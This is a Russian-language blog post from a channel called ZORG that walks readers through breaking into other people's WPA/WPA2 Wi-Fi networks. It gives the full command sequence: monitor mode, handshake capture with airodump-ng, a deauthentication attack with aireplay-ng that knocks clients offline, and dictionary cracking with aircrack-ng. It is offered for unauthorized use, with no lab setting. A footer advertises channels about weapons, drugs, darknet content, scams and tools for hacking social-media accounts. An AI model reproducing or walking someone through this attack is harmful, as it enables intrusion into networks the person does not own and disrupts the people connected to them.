Взлом Wi-Fi!

Взлом Wi-Fi!

ZORG

Взлом Wi-fi - это как уметь считать. Пригодиться в жизни каждому.

Взлом Wi-fi

Много прекрасных Wi-Fi сетей бессмысленно простаивают, иногда даже без пользователей. Перед тем, как взломать, надо разобраться с терминами взимодействия всего друг друг с другом.

Точка доступа - это чужой роутер.

Клиент - это мобила, пк. Клиент подключается к точке доступа.

ESSID/SSID - имя беспроводной сети. Например “Masha-WiFi-kot”.

BSSID - это mac-адрес устройства: 53:16:5C:0D:8C:10. Встречается на скриншотах, жестко привязан к производителю.

Хэндшейк - рукопожатие, то, чем обменивается роутер с клиентом в момент их первого подключения. Содержит такие данные, которые мы можем использовать в будущем для взлома.

WPA/WPA2 - технология защищенного доступа к Wi-Fi. То, что усложняет жизнь хакерам. Сейчас используется преимущественно WPA2.

Режим монитора - если ваш wi-fi модуль (свисток, адаптер) может непрерывно смотреть эфир на наличие новых устройств. Это нетипичная для него работа, не все устройства поддерживают этот режим.


Секретный режим


Обычно Wi-fi находится в managed-режиме. Это означает, что мы не сможем постоянно сканировать сетку. Такой режим нужен только для того, чтобы вы разово просканировали сеть и подключились к пылесосу.

 

Мы будем захватывать рукопожатие. Карту в режим монитора мы переводим для того, чтобы она успела захватить его. Дальше будем выполнять анализ уже на своем пк.

 

Открываем Kali Linux. Вводим

sudo iw dev

чтобы узнать имя интерфейса. В нашем случае это wlan0.

Некоторые системные службы мешают карте работать в режиме монитора. Нам нужно их отключить. Для этого вводим

sudo systemctl stop NetworkManager
sudo airmon-ng check kill

 

Теперь мы достаточно подготовлены, чтобы начать.

Вводим

sudo ip link set wlan0 down
sudo iw wlan0 set monitor control
sudo ip link set wlan0 up

Мы выключили карту, перевели ее в режим монитора, а потом вновь пробудили. Если ваш интерфейс не wlan0, используйте то имя, которое получили на предыдущей стадии.

Проверим, все ли получилось:

sudo iw dev

Надпись type monitor показывает, что мы нужном режиме.

 

Смотрим сети

Wi-fi нельзя взломать, если мы ничего не знаем о сети. Поэтому, первым делом, нужно заняться сканированием:

sudo airodump-ng wlan0

и мы получим список всех сетей, которые вообще можно видеть. Помните, что этот способ актуален только для WPA/WPA2.

Нашли нужную сеть? Пишите ctrl-c, чтобы остановить сканирование.

Я выбрал сеть dlink. Её BSSID – это 00:1E:58:C6:AC:FB. Там не пустое значение поля #Data. Скорее всего, к ней подключены другие устройства.

Захватываем рукопожатие:

sudo airodump-ng -c 6 --bssid 00:1E:58:C6:AC:FB -w capture wlan0

Теперь мы видим эти строки. Это раздел с клиентами.

Если BSSID клиента соответствует BSSID точки доступа, то они подключены друг к другу. Есть два подхода:

1) ждать пока клиент отключиться и снова подключиться к точке доступа

2) выполнить атаку и ускорить процесс перехвата.


Ускоряем процесс

Открываем новое окно консоли, не закрывая старое.

Вводим

sudo aireplay-ng -0 3 -a 00:1E:58:C6:AC:FB  wlan0

где mac-адрес принадлежит тому роутеру, который мы атакуем.



Вывод программы вы можете видеть на скриншоте.

посмотрите на левое окно:

 

WPA handshake: 00:1E:58:C6:AC:FB


Это означает, атака выполнена успешно.


Попробуем атаковать по словарю

Заготавливаем сам словарь, в котором будут храниться какие-нибудь наиболее употребимые пароли. По такому списку можно сломать примерно 50% всех сетей, потому что пользователи не любят придумывать сложные пароли. И это экономно с точки зрения ресурсов - перебирать пароли по словарю можно даже на древнем железе.


cp /usr/share/wordlists/xxxyou.txt.gz .
gunzip xxxyou.txt.gz
cat xxxyou.txt | sort | uniq | pw-inspector -m 8 -M 63 > newxxxyou.txt


итоговое название файла для словаря получится newxxxyou.txt


Теперь нам нужно узнать имя захваченного рукопожатия.

Выполним команду:

ls -l capture*


При этом покажет что-то в этом духе (не пугайся, если у тебя 10, 20, 1000 записей - это зависит от количества попыток захвата рукопожатий)


На скриншоте имеется файл capture-01.cap - это то, что мы ищем. Внутри находится рукопожатие.


Как я уже говорил, мы будем перебирать по словарю. Для этого используем Aircrack-ng.

Команда будет выглядеть следующим образом:

aircrack-ng -w newxxxyou.txt capture-01.cap

как очевидно из команды, сначала идет сам модуль, потом словарь, потом - файл с рукопожатием.


В результате ввода последней программы у вас откроется окно, где будет отображаться процесс подбора пароля.


Если пароль все-таки удастся подобрать, должно высветиться

KEY FOUND! [пароль который подошел].

Таким образом, мы взломали сеть Wi-fi, и теперь можем подключиться к ней с любого устройства.


На самом деле, перечисленные здесь инструменты не являются каким-то эталоном. Существуют десятки подходов к этому взлому, куча способов автоматизации процесса, а также куча проблем, которые приходится решать в процессе.


Преимущество описанного в статье метода в том, что он позволяет проводить атаку быстро, и наименее требователен к квалификации атакующего.


Хорошего дня.


НАШИ ПРОЕКТЫ:

ZORG - море годного контента. Всё об оружии, немного о наркотика, интересные факты о Даркнете. Всё это там!

ZORG 2.0 - актуальные способы заработка в 2019 году. Схемы, мануалы и сливы. Подписывайся!

ZORG 3.0 - cофты для взлома ВК,ОК, Instagram и море полезной информации.

ZORG |Складчина - дорогие схемы за сущие копейки!

Report Page